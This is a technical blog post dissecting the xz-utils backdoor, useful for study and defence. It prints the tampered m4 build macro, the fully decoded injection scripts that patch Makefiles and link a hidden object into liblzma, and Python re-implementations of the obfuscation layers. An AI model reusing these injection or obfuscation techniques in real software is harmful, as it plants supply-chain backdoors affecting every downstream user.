A backdoor was found in the well-known compression tool xz: how big is the impact, and how should we respond?

Published: 2024-04-07 04:00

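The way this backdoor was introduced is extremely stealthy. Had its discoverer, Andres Freund, not noticed abnormal CPU usage in the sshd process, it would probably not have been found.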

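Compare the backdoored m4 script with the original: can you see anything wrong? I think almost nobody would. In the diff below, the lines prefixed with - exist only in the backdoored copy from the xz-5.6.1 tarball.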

--- xz-5.6.1/m4/build-to-host.m4  2024-03-09 16:16:40.000000000 +0800
+++ /usr/share/aclocal/build-to-host.m4  2024-03-24 00:05:36.082517994 +0800
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 30
+# build-to-host.m4 serial 3
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,7 +37,6 @@
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
-  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -59,40 +58,14 @@
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
-  if test "x$gl_am_configmake" != "x"; then
-    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
-  else
-    gl_[$1]_config=''
-  fi
-  _LT_TAGDECL([], [gl_path_map], [2])dnl
-  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
-  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
-  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
-  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
-
-  dnl If the host conversion code has been placed in $gl_config_gt,
-  dnl instead of duplicating it all over again into config.status,
-  dnl then we will have config.status run $gl_config_gt later, so it
-  dnl needs to know what name is stored there:
-  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
-  dnl Search for Automake-defined pkg* macros, in the order
-  dnl listed in the Automake 1.10a+ documentation.
-  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
-  if test -n "$gl_am_configmake"; then
-    HAVE_PKG_CONFIGMAKE=1
-  else
-    HAVE_PKG_CONFIGMAKE=0
-  fi
-
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
-  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

However, note that running grep -aErls "#{4}[[:alnum:]]{5}#{4}$" ./ in the source root outputs ./tests/files/bad-3-corrupt_lzma2.xz

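The grep command-line options:

  • -a: treat binary files as text
  • -E: use extended regular expression syntax
  • -r: search subdirectories recursively
  • -l: print the names of matching files instead of the matched content
  • -s: suppress error messages about unreadable or nonexistent files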

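The regular expression:

  • #{4}: matches four consecutive # characters.
  • [[:alnum:]]{5}: matches five consecutive letters or digits. [[:alnum:]] is a character class that matches any single alphanumeric character.
  • #{4}: matches four consecutive # characters again.
  • $: anchors the match at the end of the line.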

The ####World#### in that file is what the pattern matches.

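So the name of the malicious file that carries the backdoor never appears in plain text in the build script; grep is used as a layer of indirection to find it.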
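To make the lookup concrete, here is a minimal Python sketch of what that grep invocation does. It is only an approximation: [[:alnum:]] is assumed to mean ASCII letters and digits, and the demo tree, file names and file contents are made up for illustration.

```python
import os
import re
import tempfile

# Python-bytes equivalent of the ERE "#{4}[[:alnum:]]{5}#{4}$".
# Assumption: [[:alnum:]] is treated as ASCII letters and digits (C locale).
MARKER = re.compile(rb"#{4}[0-9A-Za-z]{5}#{4}$", re.MULTILINE)


def find_marker_files(root):
    """Rough stand-in for `grep -aErls PATTERN root`."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):   # -r: recurse
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:               # -a: read bytes as text
                    data = fh.read()
            except OSError:
                continue                                   # -s: stay quiet on errors
            if MARKER.search(data):
                hits.append(path)                          # -l: file names only
    return sorted(hits)


# Tiny demo tree; names and contents are invented for this example.
with tempfile.TemporaryDirectory() as demo_root:
    os.makedirs(os.path.join(demo_root, "tests", "files"))
    with open(os.path.join(demo_root, "tests", "files", "marked.bin"), "wb") as fh:
        fh.write(b"\x00\xfd7zXZ\x00\n####World####\n")
    with open(os.path.join(demo_root, "README"), "wb") as fh:
        fh.write(b"nothing to see here\n")
    demo_hits = [os.path.relpath(p, demo_root) for p in find_marker_files(demo_root)]

print(demo_hits)
```

Only the file whose line ends with the marker is reported, which is all the build script needs in order to learn the payload's path.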

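Next, gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"` extracts the malicious file's extension, xz, which is then used as the name of the xz command-line tool. So unpacking the backdoor requires the xz-utils package to be installed already.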
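The sed expression works because .* is greedy and swallows everything up to the last dot. A small Python sketch of the same substitution (the function name is mine, not from the script):

```python
import re


def strip_to_extension(path):
    """Mimic sed 's/.*\\.//g': drop everything up to and including the last dot."""
    return re.sub(r".*\.", "", path)


tool = strip_to_extension("./tests/files/bad-3-corrupt_lzma2.xz")
print(tool)
```

The result is later spliced into the pipeline as a command name, so the string xz never has to be written out in the m4 file.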

The complete extraction command is:

sed "r\n" ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d 2> /dev/null

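  • sed "r\n" filename is effectively the same as cat filename
  • tr replaces a few ASCII bytes in the compressed data
    • \t is the tab character
    • the literal space is a space
    • \- is the hyphen (minus sign), escaped so that tr does not read it as a range
    • _ is the underscore
  • In other words, the two sets are paired position by position: tab becomes space, space becomes tab, hyphen becomes underscore, and underscore becomes hyphen.
  • xz -d decompresses the result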
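The tr step can be modelled as a byte translation table. This is a sketch of the mapping only, not of the full pipeline; the sample bytes are invented.

```python
# Byte-level model of: tr "\t \-_" " \t_\-"
SWAP = bytes.maketrans(b"\t -_", b" \t_-")


def path_map(data):
    """Swap tab<->space and hyphen<->underscore, leaving all other bytes alone."""
    return data.translate(SWAP)


sample = b"a\tb c-d_e\xfd"
swapped = path_map(sample)
print(swapped)
```

Because the mapping is two independent swaps, applying it twice gives back the original bytes. That is what lets the attacker ship a file that looks corrupt to xz until the swap is undone.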

The decompressed result is:

####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

So it appears that the infection steps are not executed on non-Linux systems.

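The script finds the source root by locating and reading config.status, because many distributions build in a separate build directory instead of running configure and make inside the source tree. The source path is stored in the srcdir variable.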

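The exported i is one long chain of head commands that alternately discards 1024 bytes and passes through 2048 bytes of its input, so only selected slices of the file are kept.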
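The effect of that head chain on a byte stream can be sketched in Python. The round count of 16 is my own count of the repetitions in the listing above, and the function and parameter names are hypothetical.

```python
def skip_take(data, skip=1024, take=2048, rounds=16, last_take=939):
    """Model of the head chain: drop `skip` bytes, keep `take` bytes, repeated;
    then drop `skip` once more and keep a final `last_take` bytes."""
    out = bytearray()
    pos = 0
    for _ in range(rounds):
        pos += skip                      # (head -c +1024 >/dev/null)
        out += data[pos:pos + take]      # head -c +2048
        pos += take
    pos += skip                          # last discarded chunk
    out += data[pos:pos + last_take]     # head -c +939
    return bytes(out)


# Synthetic input, large enough to feed every step.
demo_input = bytes(i % 251 for i in range(60000))
kept = skip_take(demo_input)
print(len(kept))
```

With these defaults the chain keeps 16 * 2048 + 939 bytes out of the first 16 * 3072 + 1024 + 939 bytes of input, in their original order.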

It then runs the following command. Here I have removed the final stage that pipes the result to /bin/sh for execution.

xz -dc ./tests/files/good-large_compressed.lzma | \
  eval $i | \
  tail -c +31233 | \
  tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" | \
  xz -F raw --lzma1 -dc
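The tr stage in this pipeline is a byte substitution table written as octal ranges. The sketch below expands such a spec in Python and checks that the ranges cover every byte value exactly once. The parser only handles the range-only form used here, and the helper names are mine. The second spec is the one that appears later in the next-stage script.

```python
import re


def expand_tr_set(spec):
    """Expand a tr set that is written purely as octal ranges."""
    out = bytearray()
    for lo, hi in re.findall(r"\\([0-7]{1,3})-\\([0-7]{1,3})", spec):
        out.extend(range(int(lo, 8), int(hi, 8) + 1))
    return bytes(out)


def tr_table(set1, set2=r"\0-\377"):
    """Translation table equivalent to: tr SET1 SET2 (both sets must be 256 long here)."""
    return bytes.maketrans(expand_tr_set(set1), expand_tr_set(set2))


STAGE1 = r"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"
STAGE2 = r"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"

stage1_table = tr_table(STAGE1)
stage2_table = tr_table(STAGE2)
print(stage1_table[0o114], stage1_table[0o113])
```

Both specs turn out to be permutations of all 256 byte values, so the step is a simple substitution cipher: data.translate(stage1_table) would undo it for the first payload.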

The output (after formatting) is:

P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
[ ! $(uname)="Linux" ] && exit 0
eval $zrKcVq
if test -f config.status; then
  eval $zrKcSS
  eval $(grep ^LD=\'\/ config.status)
  eval $(grep ^CC=\' config.status)
  eval $(grep ^GCC=\' config.status)
  eval $(grep ^srcdir=\' config.status)
  eval $(grep ^build=\'x86_64 config.status)
  eval $(grep ^enable_shared=\'yes\' config.status)
  eval $(grep ^enable_static=\' config.status)
  eval $(grep ^gl_path_map=\' config.status)
  vs=$(grep -broaF '~!:_ W' $srcdir/tests/files/ 2>/dev/null)
  if test "x$vs" != "x" >/dev/null 2>&1; then
    f1=$(echo $vs | cut -d: -f1)
    if test "x$f1" != "x" >/dev/null 2>&1; then
      start=$(expr $(echo $vs | cut -d: -f2) + 7)
      ve=$(grep -broaF '|_!{ -' $srcdir/tests/files/ 2>/dev/null)
      if test "x$ve" != "x" >/dev/null 2>&1; then
        f2=$(echo $ve | cut -d: -f1)
        if test "x$f2" != "x" >/dev/null 2>&1; then
          [ ! "x$f2" = "x$f1" ] && exit 0
          [ ! -f $f1 ] && exit 0
          end=$(expr $(echo $ve | cut -d: -f2) - $start)
          eval $(cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc)
        fi
      fi
    fi
  fi
  eval $zrKccj
  if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status >/dev/null 2>&1; then
    exit 0
  fi
  if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h >/dev/null 2>&1; then
    exit 0
  fi
  if test "x$enable_shared" != "xyes"; then
    exit 0
  fi
  if ! (echo "$build" | grep -Eq "^x86_64" >/dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" >/dev/null 2>&1); then
    exit 0
  fi
  if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c >/dev/null 2>&1; then
    exit 0
  fi
  if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c >/dev/null 2>&1; then
    exit 0
  fi
  if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h >/dev/null 2>&1; then
    exit 0
  fi
  if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h >/dev/null 2>&1; then
    exit 0
  fi
  if test "x$GCC" != 'xyes' >/dev/null 2>&1; then
    exit 0
  fi
  if test "x$CC" != 'xgcc' >/dev/null 2>&1; then
    exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' >/dev/null 2>&1; then
    exit 0
  fi
  if ! test -f "$srcdir/tests/files/$p" >/dev/null 2>&1; then
    exit 0
  fi
  if ! test -f "$srcdir/tests/files/$U" >/dev/null 2>&1; then
    exit 0
  fi
  if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64"; then
    eval $zrKcst
    j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4"
    if ! grep -qs "$j" src/liblzma/Makefile >/dev/null 2>&1; then
      exit 0
    fi
    z="^am__uninstall_files_from_dir = {"
    if ! grep -qs "$z" src/liblzma/Makefile >/dev/null 2>&1; then
      exit 0
    fi
    w="^am__install_max ="
    if ! grep -qs "$w" src/liblzma/Makefile >/dev/null 2>&1; then
      exit 0
    fi
    E=$z
    if ! grep -qs "$E" src/liblzma/Makefile >/dev/null 2>&1; then
      exit 0
    fi
    Q="^am__vpath_adj_setup ="
    if ! grep -qs "$Q" src/liblzma/Makefile >/dev/null 2>&1; then
      exit 0
    fi
    M="^am__include = include"
    if ! grep -qs "$M" src/liblzma/Makefile >/dev/null 2>&1; then
      exit 0
    fi
    L="^all: all-recursive$"
    if ! grep -qs "$L" src/liblzma/Makefile >/dev/null 2>&1; then
      exit 0
    fi
    m="^LTLIBRARIES = \$(lib_LTLIBRARIES)"
    if ! grep -qs "$m" src/liblzma/Makefile >/dev/null 2>&1; then
      exit 0
    fi
    u="AM_V_CCLD = \$(am__v_CCLD_\$(V))"
    if ! grep -qs "$u" src/liblzma/Makefile >/dev/null 2>&1; then
      exit 0
    fi
    if ! grep -qs "$O" libtool >/dev/null 2>&1; then
      exit 0
    fi
    eval $zrKcTy
    b="am__test = $U"
    sed -i "/$j/i$b" src/liblzma/Makefile || true
    d=$(echo $gl_path_map | sed 's/\\/\\\\/g')
    b="am__strip_prefix = $d"
    sed -i "/$w/i$b" src/liblzma/Makefile || true
    b="am__dist_setup = \$(am__strip_prefix) | xz -d 2>/dev/null | \$(SHELL)"
    sed -i "/$E/i$b" src/liblzma/Makefile || true
    b="\$(top_srcdir)/tests/files/\$(am__test)"
    s="am__test_dir=$b"
    sed -i "/$Q/i$s" src/liblzma/Makefile || true
    h="-Wl,--sort-section=name,-X"
    if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" >/dev/null 2>&1; then
      h=$h",-z,now"
    fi
    j="liblzma_la_LDFLAGS += $h"
    sed -i "/$L/i$j" src/liblzma/Makefile || true
    sed -i "s/$O/$C/g" libtool || true
    k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))"
    sed -i "s/$u/$k/" src/liblzma/Makefile || true
    l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\
      export top_srcdir='\$(top_srcdir)'; \\\\\n\
      export CC='\$(CC)'; \\\\\n\
      export DEFS='\$(DEFS)'; \\\\\n\
      export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\
      export INCLUDES='\$(INCLUDES)'; \\\\\n\
      export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\
      export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\
      export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\
      export CFLAGS='\$(CFLAGS)'; \\\\\n\
      export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\
      export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\
      export libdir='\$(libdir)'; \\\\\n\
      export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\
      export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\
      sed rpath \$(am__test_dir) | \$(am__dist_setup) >/dev/null 2>&1"
    sed -i "/$m/i$l" src/liblzma/Makefile || true
    eval $zrKcHD
  fi
elif (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then
  vs=$(grep -broaF 'jV!.^%' $top_srcdir/tests/files/ 2>/dev/null)
  if test "x$vs" != "x" >/dev/null 2>&1; then
    f1=$(echo $vs | cut -d: -f1)
    if test "x$f1" != "x" >/dev/null 2>&1; then
      start=$(expr $(echo $vs | cut -d: -f2) + 7)
      ve=$(grep -broaF '%.R.1Z' $top_srcdir/tests/files/ 2>/dev/null)
      if test "x$ve" != "x" >/dev/null 2>&1; then
        f2=$(echo $ve | cut -d: -f1)
        if test "x$f2" != "x" >/dev/null 2>&1; then
          [ ! "x$f2" = "x$f1" ] && exit 0
          [ ! -f $f1 ] && exit 0
          end=$(expr $(echo $ve | cut -d: -f2) - $start)
          eval $(cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc)
        fi
      fi
    fi
  fi
  eval $zrKcKQ
  if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc64_fast.c; then
    exit 0
  fi
  if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc32_fast.c; then
    exit 0
  fi
  if ! grep -qs "$R" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
    exit 0
  fi
  if ! grep -qs "$x" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
    exit 0
  fi
  if ! grep -qs "$C" ../../libtool; then
    exit 0
  fi
  if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z -Wl,now" >/dev/null 2>&1; then
    exit 0
  fi
  if echo $liblzma_la_LINK | grep -qs -e "lazy" >/dev/null 2>&1; then
    exit 0
  fi
  N=0
  W=0
  Y=$(grep "dnl Convert it to C string syntax." $top_srcdir/m4/gettext.m4)
  eval $zrKcjv
  if test -z "$Y"; then
    N=0
    W=88664
  else
    N=88664
    W=0
  fi
  xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
  if ! test -f liblzma_la-crc64-fast.o; then
    exit 0
  fi
  cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true
  V='#endif\n#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\nextern int _get_cpuid(int, void*, void*, void*, void*, void*);\nstatic inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19); return success && (r[2] & ecx_mask) == ecx_mask; }\n#else\n#define _is_arch_extension_supported is_arch_extension_supported'
  eval $yosA
  if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | sed "/include \"crc_x86_clmul.h\"/a \\$V" | sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/dev/null | $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c - $P -o .libs/liblzma_la-crc64_fast.o 2>/dev/null; then
    cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true
    eval $BPep
    if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc32_fast.c | sed "/include \"crc32_arm64.h\"/a \\$V" | sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2>/dev/null | $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r -x c - $P -o .libs/liblzma_la-crc32_fast.o; then
      eval $RgYB
      if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then
        if test ! -f .libs/liblzma.so; then
          mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
          mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
        fi
        rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true
      else
        mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
        mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
      fi
      rm -f .libs/liblzma_la-crc32-fast.o || true
      rm -f .libs/liblzma_la-crc64-fast.o || true
    else
      mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
      mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
    fi
  else
    mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
  fi
  rm -f liblzma_la-crc64-fast.o || true
fi
eval $DHLd

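This complex script does several things:

  • It exits without running the backdoor-injection logic when it detects an unsuitable environment. The following environments are known to be unaffected:
    • not a Linux system (uname is not Linux)
    • no IFUNC. IFUNC (GNU indirect function) is a glibc feature that lets a resolver function choose a symbol's implementation at load time.
    • not building a shared library (shared object)
    • not x86_64, or the target triple does not end in linux-gnu
    • the compiler is not GCC, or the linker is not GNU ld
  • It extracts a precompiled binary from the test files
  • It modifies the source code and the build scripts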
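The binary extraction step relies on the awk one-liner in the script, which looks like an RC4-style stream cipher with two twists: the table is initialised by a fixed formula instead of a key, and the keystream byte is added to the data rather than XORed. Below is my Python port of that awk program as I read it. The encode function is a hypothetical inverse that I added only to check the port round-trips.

```python
def keystream_state():
    """Table and indices after the 8192 warm-up rounds of the awk BEGIN block."""
    m = 256
    c = [(i * 7 + 5) % m for i in range(m)]
    i = j = 0
    for _ in range(8192):
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        c[i] = c[j]
        c[j] = a
    return c, i, j


def apply_stream(data, sign):
    """Add (sign=+1, as the awk code does) or subtract (sign=-1) the keystream."""
    m = 256
    c, i, j = keystream_state()
    out = bytearray()
    for v in data:
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        b = c[j]
        c[i] = b
        c[j] = a
        k = c[(a + b) % m]
        out.append((v + sign * k) % m)
    return bytes(out)


def decode(data):
    return apply_stream(data, +1)


def encode(data):
    # Hypothetical inverse, not present in the script; used only for the self-check.
    return apply_stream(data, -1)


message = b"not the real payload, just a round-trip check"
print(decode(encode(message)) == message)
```

Since there is no secret key, this layer only hides the object file from casual inspection and signature scanners. Anyone with the script can reproduce the keystream.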

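Contrary to many reports, the formatted code above shows a second code path, the elif branch, that is not guarded by the Debian/RPM check. It is taken when there is no config.status in the current directory but .libs/liblzma_la-crc64_fast.o and .libs/liblzma_la-crc32_fast.o already exist. So even on a distribution that is neither Debian-based nor RPM-based, running the script again after make (for example by re-running configure) could reach another infection path.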

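The Debian/RPM code path injects the malicious script into the Makefile, because the malicious code can only be injected after the sources have been compiled. The logic injected into the Makefile amounts to extracting the malicious script again from the two samples under tests.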
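The Makefile edits in the script all use the same sed idiom, sed -i "/PATTERN/iTEXT", which inserts TEXT before each line matching PATTERN. A simplified Python sketch of that idiom follows. It matches on a literal line prefix instead of a sed regular expression, and the sample Makefile lines are partly made up.

```python
def insert_before(lines, anchor_prefix, new_line):
    """Insert new_line before every line that starts with anchor_prefix."""
    out = []
    for line in lines:
        if line.startswith(anchor_prefix):
            out.append(new_line)
        out.append(line)
    return out


# Illustrative Makefile fragment; only the first line mirrors a pattern from the script.
makefile = [
    "ACLOCAL_M4 = $(top_srcdir)/aclocal.m4",
    "am__install_max = 40",
    "all: all-recursive",
]
patched = insert_before(makefile, "ACLOCAL_M4 = ", "am__test = bad-3-corrupt_lzma2.xz")
print("\n".join(patched))
```

The injected variable names (am__test, am__strip_prefix, am__dist_setup) imitate Automake's own am__ naming, which makes the additions easy to overlook in a generated Makefile.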

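In the actual infection step, the two object files liblzma_la-crc64_fast.o and liblzma_la-crc32_fast.o, which should have been compiled only from ./src/liblzma/check/crc64_fast.c and ./src/liblzma/check/crc32_fast.c, are linked together with the malicious object file.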

In addition, the function that detects instruction-set extensions is replaced:

#define BUILDING_CRC64_CLMUL
#include "crc_x86_clmul.h"
#endif
#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && \
    defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && \
    (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))
extern int _get_cpuid(int, void *, void *, void *, void *, void *);
static inline bool _is_arch_extension_supported(void) {
  int success = 1;
  uint32_t r[4];
  success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3],
                       ((char *)__builtin_frame_address(0)) - 16);
  const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);
  return success && (r[2] & ecx_mask) == ecx_mask;
}
#else
#define _is_arch_extension_supported is_arch_extension_supported

The correct __get_cpuid prototype is:

static __inline int
__get_cpuid (unsigned int __leaf,
             unsigned int *__eax, unsigned int *__ebx,
             unsigned int *__ecx, unsigned int *__edx)

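In other words, the replacement deliberately passes one extra argument. __builtin_frame_address(0) returns the frame address of the current function (not its return address), so this is presumably an attempt to leave a stack address in a register. On x86_64 Linux the sixth integer argument is passed in r9.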
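Two small facts from this section can be checked mechanically: which CPU features ecx_mask tests, and which register carries a sixth argument. The Python sketch below assumes the standard CPUID leaf 1 ECX bit assignments and the System V x86-64 calling convention; the variable names are mine.

```python
# CPUID leaf 1, ECX feature bits (per the Intel SDM bit assignments).
ECX_FEATURES = {1: "PCLMULQDQ", 9: "SSSE3", 19: "SSE4.1"}

# Same expression as in the injected C code.
ecx_mask = (1 << 1) | (1 << 9) | (1 << 19)
required = [name for bit, name in sorted(ECX_FEATURES.items()) if ecx_mask & (1 << bit)]

# Integer/pointer argument registers, in order, in the System V x86-64 ABI.
SYSV_INT_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]
sixth_arg_reg = SYSV_INT_ARG_REGS[5]

print(hex(ecx_mask), required, sixth_arg_reg)
```

The feature check itself matches what a carry-less-multiply CRC implementation would legitimately need, so the only visibly odd part of the replacement is the extra pointer argument.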

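It is worth noting that Jia Tan, the author who released the backdoored versions, had discussed a problem with Sam James on Gentoo Linux's Bugzilla two months earlier: a GCC bug that caused ifunc-based function symbol overriding to behave incorrectly.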

bugs.gentoo.org/925415

It was eventually determined to be a GCC bug:

xz-utils segfaults when built with -fprofile-generate (bad interaction between IFUNC and binding?)
